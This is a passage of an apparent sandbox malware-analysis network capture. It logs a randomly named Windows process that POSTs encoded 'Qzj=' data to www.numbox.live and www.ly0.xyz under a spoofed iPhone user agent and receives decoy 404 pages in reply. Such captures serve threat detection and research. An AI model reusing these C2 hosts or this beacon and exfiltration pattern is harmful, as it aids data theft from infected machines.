                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr3yPUUnIS4XiiIziEIJKxRaIkz8biy8J36HZc+0Fns3CiFhgtxkfjJuQRndsfaNlQeDmj1nMLt7ygqkRVHAQgquyfNGszZZwKKyevRq/8xm48+EyT84VGVK5s/0YbO78L2kCUbX4taqC+Zxzn7kRKmn3cpK3RkebG0uEQ8vQmfTaSfrIRqi+T3w==
Oct 24, 2024 05:08:58.751224041 CEST | 1236 | IN
HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:08:58 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 24, 2024 05:08:58.751310110 CEST | 1236 | IN
Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="
Oct 24, 2024 05:08:58.751399040 CEST | 1236 | IN
Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03
Oct 24, 2024 05:08:58.751456976 CEST | 832 | IN
Data Ascii: .value=='') this.value=''" onFocus="if(this.value =='' ) this.value=''" > <a href="#" class="btn btn-1 ">Search</a> </div> </form> </div> </div> </div> </div> </div


Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 50032 | Destination IP: 63.250.47.57 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction
Oct 24, 2024 05:09:00.623117924 CEST | 812 | OUT
POST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyut36jdc/2tniXCiKBgo8EfoJuMZnYUfaLJQeD2j1UkKsryimERXDAQgquyfNG4VZYYKKHWvA7/jym4/ukyT44VCVK5e/wZMO4UL2hGUbFAiRqC8dxyJ/RkopiWd2czf7+T+8IVKtexxNT+hCsBlnhDas4XFL2bTmH+8cehgxcTtFbQ=
Oct 24, 2024 05:09:01.314924002 CEST | 1236 | IN
HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:01 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
Oct 24, 2024 05:09:01.315006018 CEST | 212 | IN
Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/
Oct 24, 2024 05:09:01.315061092 CEST | 1236 | IN
Data Ascii: ie.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'><link href='http://fonts.googleapis.com/css?family=Open+Sans:400' rel='stylesheet' type='text/css'>
Oct 24, 2024 05:09:01.315116882 CEST | 1236 | IN
Data Ascii: <li><a href="#">Process 03</a></li> </ul> </li> <li><a href="contact.html">Contact</a></li> </ul> </div> </div> </div> </div>
Oct 24, 2024 05:09:01.315171003 CEST | 620 | IN
Data Ascii: </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href="#"></a></li> <li><a class="icon-2" href="#">


Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 50033 | Destination IP: 63.250.47.57 | Destination Port: 80 | PID: 5568 | Process: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
Timestamp | Bytes transferred | Direction
Oct 24, 2024 05:09:03.171505928 CEST | 10894 | OUT
POST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyul36wFc9QlnjXCiURgp8Ef1JuUVnZolaOVQM16j8FkKiryi7URWHAQ5quibNGoVZYYKKAmvAq/j0m48+EyP84UlVKhk/wMxNI0L2BWUXW4iSKC6axyn/Rgepm+r2cu078P++OU80ckvfAD6W7lguyXa0Kv5MkTskH6qT8Myru71HOCEJ83JnrWkKlf1meyPjPOeDeFgbYRYZ1YzhN77aSd4Z9Nl9yoecwQHZ9DG1VOrGpAMCqO5COlf99QyfF3k45Q5qx7I9dUw1PF8vx135v+XhG9BwzBfPOTorBIRmSiqZOF7b2kzbZKKN5k9xgGxuWp4ujkYFFGWG4NJXRm5/7/9aNphqcE/jyYYjS/FSsbM9cVoBM1arSc2TqEsQrYoM3VW4dPPpW4WnFxVl4LpfiYGoWHUTXGGMF+Rt/JJwQ6cFjiwoIIBXBkfKDevj8b1stbDRWofWZt9yVafH8PC5WtRIbW/AOSKc/9jWOUbMH4a3qiXjWxYm/P/Q9nX6/RdWyLJnXZjY83JIxZCAH+0rr3U2/LLfqc+qRxBQjhcLkYCM46XblsR5tgRbPPB40Z8y8rTilTtfZacnadXUyjWX+6IK3BtutKl5UbUAhx1a4/N5cVxxUJZPS3XEGYn5PyADnK+vEys1Fm4VIKWqxwWp7+f71eWf4augAKNEgzLRRdsgSj+GBtUhh8tRrv/ovxmI9EiALi9VCbd69/yKw2+pJAdhrt3kiugIi8+jwikrfLqYx9lm2GxDJNm+6F1JmxG67IqDYa/5kdmfUsfZEr8MmPfC1FANApnNJ2k+dMftShLZLoIOQrZPRK7hIDpAGO31bePhp/3X5hvSNwoPscKkVEKNXbNqtce4Y645ElxRUkHQaf7oPTUSXQ0sr1MOFGZjw9dFncBcfi+YD684t6w53lGIxu5Qy/s4JuKkinn/mzf6IT5KE679+iC8yNAXTr6ixumrjRV [TRUNCATED]
Oct 24, 2024 05:09:03.869575024 CEST | 1236 | IN
HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:03 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                     Oct 24, 2024 05:09:03.869662046 CEST | 1236 | IN | Data Raw: 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f
                                                                                                                    Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="
                                                                                                                     Oct 24, 2024 05:09:03.869715929 CEST | 1236 | IN | Data Raw: 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 70 72 6f 63 65 73 73 2e 68 74 6d 6c 22 3e 50 72 6f 63 65 73 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d
                                                                                                                    Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03
                                                                                                                     Oct 24, 2024 05:09:03.869791031 CEST | 832 | IN | Data Raw: 2e 76 61 6c 75 65 3d 3d 27 27 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 6f 6e 46 6f 63 75 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 20 3d 3d 27 27 20 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: .value=='') this.value=''" onFocus="if(this.value =='' ) this.value=''" > <a href="#" class="btn btn-1 ">Search</a> </div> </form> </div> </div> </div> </div> </div


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     32 | 192.168.2.4 | 50034 | 63.250.47.57 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Oct 24, 2024 05:09:05.715007067 CEST | 530 | OUT | GET /q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                     Oct 24, 2024 05:09:06.409394026 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:06 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                     Oct 24, 2024 05:09:06.409436941 CEST | 1236 | IN | Data Raw: 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c
                                                                                                                    Data Ascii: [endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="te
                                                                                                                     Oct 24, 2024 05:09:06.409461021 CEST | 424 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 70 72 6f 63 65 73 73 2e 68 74 6d 6c 22 3e 50 72 6f 63 65 73 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href
                                                                                                                     Oct 24, 2024 05:09:06.409478903 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 68 65 61 64 65 72 3e 0d 0a 3c 64 69 76 20 63
                                                                                                                    Data Ascii: </div> </div> </div> </div> </div></header><div class="bg-content"> ... content --> <div id="content"> <div class="container"> <div class="row "> <div class="span12"> <d
                                                                                                                     Oct 24, 2024 05:09:06.409506083 CEST | 423 | IN | Data Raw: 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 32 22 20 68 72 65 66 3d 22 23 22 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d
                                                                                                                    Data Ascii: a></li> <li><a class="icon-2" href="#"></a></li> <li><a class="icon-3" href="#"></a></li> <li><a class="icon-4" href="#"></a></li> </ul> <div class="privacy pull-left">&copy; 2013 | <a href="http://www.dzyngiri.c


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     33 | 192.168.2.4 | 50035 | 104.21.78.104 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Oct 24, 2024 05:09:11.500847101 CEST | 780 | OUT | POST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 78 61 43 75 2f 77 57 53 6c 73 61 4f 64 36 2f 4a 35 34 7a 57 4e 52 4b 6c 37 71 2b 56 37 6d 67 31 30 59 63 36 50 58 4d 2b 30 53 7a 32 6a 34 48 36 50 56 38 75 75 66 54 49 4a 73 33 66 59 75 5a 69 6f 7a 43 63 67 4b 6f 38 4d 59 53 4f 52 72 72 64 6d 53 73 56 2f 61 33 30 74 6b 44 46 6b 6c 63 55 71 43 68 2f 77 4a 5a 58 4f 65 4a 6b 46 4a 48 68 69 47 30 6e 6a 39 55 54 74 62 35 70 47 55 34 52 7a 42 72 7a 6a 6e 55 45 75 4d 4f 44 54 6c 7a 4a 66 35 4c 57 70 69 70 64 45 4b 79 52 4c 46 68 66 48 70 64 41 61 5a 35 2f 57 7a 2b 48 77 30 75 5a 7a 31 47 34 34 77 3d 3d
                                                                                                                    Data Ascii: Qzj=JuB01QLRMoG1xaCu/wWSlsaOd6/J54zWNRKl7q+V7mg10Yc6PXM+0Sz2j4H6PV8uufTIJs3fYuZiozCcgKo8MYSORrrdmSsV/a30tkDFklcUqCh/wJZXOeJkFJHhiG0nj9UTtb5pGU4RzBrzjnUEuMODTlzJf5LWpipdEKyRLFhfHpdAaZ5/Wz+Hw0uZz1G44w==
                                                                                                                     Oct 24, 2024 05:09:12.547717094 CEST | 1102 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:12 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K67qqacxrmcQWwlBPTWGXMxK%2Fvm08k3z7Z3YbtZ8Oq5ZTwLOUcoO0tKk9rUIoExzQeXLj%2FJHx%2BySst3AWVOVWffHX%2FzldCzkIFW7ybHTqSTTMAooQTGzlAO4Z72%2FEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c4463cdae76a-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1330&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=780&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     34 | 192.168.2.4 | 50036 | 104.21.78.104 | 80 | 5568 | C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Oct 24, 2024 05:09:14.046545982 CEST | 800 | OUT | POST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 77 31 31 34 73 36 41 79 77 2b 39 43 7a 32 78 59 48 6d 43 31 39 69 75 66 66 36 4a 75 54 66 59 75 4e 69 6f 79 79 63 67 63 67 37 4d 49 53 4d 59 4c 72 66 69 53 73 56 2f 61 33 30 74 6b 57 51 6b 6c 6b 55 70 78 4a 2f 68 62 78 55 43 2b 4a 6e 50 70 48 68 30 47 30 6a 6a 39 56 47 74 66 77 68 47 57 77 52 7a 44 7a 7a 69 32 55 48 67 4d 4f 46 65 46 79 43 56 62 4b 66 72 41 34 4c 4b 36 75 68 41 47 59 69 43 76 4d 61 4c 6f 59 6f 45 7a 61 30 74 7a 6e 74 2b 32 37 78 6a 78 4a 54 4c 66 6b 59 31 46 49 4a 69 6c 6d 6e 6c 73 77 56 65 55 59 3d
                                                                                                                    Data Ascii: Qzj=JuB01QLRMoG1z5qu+XCSnMaPY6/JyYzSNRWl7oS/7Tw114s6Ayw+9Cz2xYHmC19iuff6JuTfYuNioyycgcg7MISMYLrfiSsV/a30tkWQklkUpxJ/hbxUC+JnPpHh0G0jj9VGtfwhGWwRzDzzi2UHgMOFeFyCVbKfrA4LK6uhAGYiCvMaLoYoEza0tznt+27xjxJTLfkY1FIJilmnlswVeUY=
                                                                                                                     Oct 24, 2024 05:09:15.124953032 CEST | 1100 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U6FDrURNnh%2BiPQaqhsBqzABoQ4AuGqTheNnXerAYfIcQa8QedIoQx%2B8CWJaEd4aJOf6wXw7mKNjrAO7d3fneeF9b4s49V98vq9MyIysOQtif2%2FJI%2FskDdn7PubqPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c4562856474c-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=800&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
